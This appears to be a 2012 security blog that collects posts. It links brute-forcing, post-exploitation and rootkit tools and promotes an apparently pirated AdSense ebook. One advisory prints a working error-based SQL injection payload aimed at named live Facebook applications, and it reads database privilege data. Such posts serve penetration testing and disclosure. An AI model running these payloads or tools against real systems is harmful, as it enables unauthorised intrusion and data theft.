Thursday, 23. February 2012
Google AdSense Secrets 5.0
*How to Claim Your Share of The Multi-Billion Dollar AdSense Pie
*Ways to Build An Adsense Ready Website Without a Domain or Hosting
*Secrets to Tweaking and Optimizing your Ads for Maximum Revenue
*How to use Google's Custom Search engine to Catch Fickle Visitors
*Special Code to Influence Your Ads with Section Targeting and Keywords
*How to Understand your AdSense Stats, Channels and Split Testing


Download PDF
http://depositfiles.com/files/rq4xjhc37
http://www.filesonic.com/file/958307384/G00gle_adsen5.rar

by
Amarjit Singh

SecToolMarket
SecToolMarket currently supports the following features:

1- A clear and simple presentation of the 2011 benchmark of 60 web application scanners, with a "click to get anywhere" interface.
2- Product specific, Test specific and Vendor specific unified information.
3- Comparison tables for product information, general features, authentication features, input vector support (new!), coverage (new!), audit features and complementary audit features (data reflects the results published in the *08/2011* benchmark).
4- Detailed comparison of SQL Injection and Reflected Cross Site Scripting detection accuracy (data reflects the results published in the *08/2011* benchmark).
5- Glossaries for many of the terms & features implemented in the various products.
6- Statistics for many of the benchmark's results (how many scanners support a certain feature, implement a certain vulnerability check, etc).
7- Built-in filters for comparing unified lists of products, commercial products or open source products.
8- Additional content that wasn't published in the 2011 benchmark.
9- Notifications on SVN activities and upcoming features.
10- A framework for presenting updated & new results more frequently.

Note that the information currently presented on the website reflects data from August 2011, and that the two new benchmark categories (input vector support and coverage) still require modifications and updates. According to the author, this information will be updated more often and will enable us to track the research progress.

Info
http://www.sectoolmarket.com/

Mirage Anti-Bot
Jean-Pierre (aka DarkCoderSc) and Fred De Vries have developed and released the second version of another great security tool, named "Mirage Anti-Bot 2.0". Zeus and SpyEye were the two main families of botnet software. These types of malware are spread mainly through drive-by downloads and phishing schemes.

Download
http://unremote.org/downloads/Mirage2/Setup.exe

Patator - brute-forcing tool - Linux
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.

Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* http_fuzz : Brute-force HTTP/HTTPS
* pop_passd : Brute-force poppassd (not POP3)
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Forward lookup subdomains
* dns_reverse : Reverse lookup subnets
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files

Download
http://code.google.com/p/patator/downloads/list

Sunday, 19. February 2012
Drupal Security Scanner - Linux
This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster. Here is a little demonstration. After downloading the script (in Python), you simply type:

> python DPScan.py [website url]

Download
https://github.com/Rorchackh/Blue-Sky-Information-Security/blob/master/DPScan.py

Saturday, 18. February 2012
What Is A Rootkit?
At the core of the term "rootkit" are two words: "root" and "kit". Root refers to the all-powerful "Administrator" account on Unix and Linux systems, and kit refers to a set of programs or utilities that allow someone to maintain root-level access to a computer. However, one other aspect of a rootkit, beyond maintaining root-level access, is that the presence of the rootkit should be undetectable.

Download BootRoot
http://www.eeye.com/Resources/Security-Center/Research/Tools/BootRoot

Download Jynx
http://www.blackhatacademy.org/security101/index.php?title=Jynx

Intersect 2.0 - Post Exploitation Automation - Linux
Intersect 2.0 is a Python script written to perform automated post-exploitation information gathering and reporting. The general idea is that after you have exploited a target, you run this script and it performs a variety of tasks that you would normally need to perform manually. Intersect will collect password files, copy SSH keys, enumerate processes and installed applications, gather detailed network information, map the host's internal network (for pivoting), locate and identify common anti-virus and firewall applications, and much more.

Download
https://github.com/ohdae/Intersect-2.0/

Friday, 17. February 2012
Blackhat Training on The Social-Engineer Toolkit
For more information or to register, head over here: http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html. You’ll also get a free Teensy device that we’ll be programming during the class! If you are a penetration tester, or wanting to get into it, this is your course. Learn how to write your own modules, customize your own attacks, build your attack off your company and have a high level of success.

Info
http://www.secmaniac.com/blog/2012/02/15/blackhat-training-on-the-social-engineer-toolkit/

Nessus Vulnerability Scanner
The Nessus vulnerability scanner is available as a stand-alone network scanner, as a subscription service or as a closely integrated scanning component of SecurityCenter.

Download
http://www.nessus.org/products/nessus/nessus-download-agreement

FAQ
http://www.nessus.org/products/nessus/nessus-faq

Tuesday, 14. February 2012
Facebook - SQL Injection
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/viewmycalendar/

SQL Error Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/viewmycalendar/index.php?page=1'

----------------------------------------------------------------------

Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/lifesmile/

SQL Error Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)


by
Ninja-Sec

Security Xploit v1.0 - Android App
Requirements
Requires Android Market and Google account: No
Requires third-party libraries: No
Requires 'rooted' device: No
Target Android version: Android 3.2
Minimum Android version: Android 1.6
Minimum screen width: 240 dpx

Download
http://slideme.org/mobileapp/download/1a3dc792-55a7-11e1-a703-00505690390e.apk
